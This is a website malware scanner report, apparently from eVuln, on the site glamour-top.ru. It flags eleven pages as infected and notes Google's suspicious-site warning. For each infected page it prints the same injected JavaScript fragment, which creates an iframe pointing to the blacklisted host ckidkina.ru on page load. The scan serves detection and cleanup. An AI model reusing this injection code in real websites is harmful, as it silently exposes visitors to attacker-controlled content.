New scan:

Malware Scanner report for glamour-top.ru

Malicious/Suspicious/Total urls checked
11/0/15
11 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "glamour-top.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=glamour-top.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://glamour-top.ru/
200 OK
Content-Length: 18880
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/design/js/jquery-1.4.4.min.js
200 OK
Content-Length: 78601
Content-Type: application/x-javascript
clean
http://glamour-top.ru/design/js/my_func.js
200 OK
Content-Length: 442
Content-Type: application/x-javascript
clean
http://glamour-top.ru/design/highslide/highslide-with-gallery.js
200 OK
Content-Length: 76023
Content-Type: application/x-javascript
clean
http://glamour-top.ru/news/
200 OK
Content-Length: 10118
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/new/
200 OK
Content-Length: 9372
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/delivery/
200 OK
Content-Length: 26095
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/shares/
200 OK
Content-Length: 7831
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/contacts/
200 OK
Content-Length: 9939
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/Netshop/woman/
200 OK
Content-Length: 10223
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/Netshop/woman/GHJ/
200 OK
Content-Length: 16565
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/Netshop/woman/popular/
200 OK
Content-Length: 17711
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/Netshop/woman/rfghjk/
200 OK
Content-Length: 10579
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}

http://glamour-top.ru/netcat_files/119/143/5e6fa813e82d8930be14820f0a1c98b5
200 OK
Content-Length: 52309
clean
http://glamour-top.ru/test404page.js
404 Not Found
Content-Length: 6386
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: ckidkina.ru

...[575 bytes skipped]...
iframe.setAttribute("frameBorder", "0");
var dels = document.getElementsByTagName("DIV");
if(dels.length == 0){document.body.appendChild(iframe);}
else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);}
iframe.src = url;
return true;
}
}
function gtkhjasd454hfhf235(){
create_frame("http://ckidkina.ru/?id=ifrm");
}
try {
if(window.attachEvent) {
window.attachEvent('onload', gtkhjasd454hfhf235);
} else {
if(window.onload) {
var curronload = window.onload;
var newonload = function() {
curronload();
gtkhjasd454hfhf235();
};
window.onload = newonload;
} else {
window.on
...[78 bytes skipped]...

Decoded script:


function gtkhjasd454hfhf235() {
create_frame("http://ckidkina.ru/?id=ifrm");
}


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: glamour-top.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 09:09:30 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: sid=5565460710a3fe057a4532def64282d9; path=/; domain=glamour-top.ru
Set-Cookie: CookieID=d75e5bf84ab8b1b717eae07c5ea1d8bd; expires=Sun, 10-Jan-2016 09:09:30 GMT; path=/; domain=glamour-top.ru
X-Powered-By:
Second query (visit from search engine):
GET / HTTP/1.1
Host: glamour-top.ru
Referer: http://www.google.com/search?q=glamour-top.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.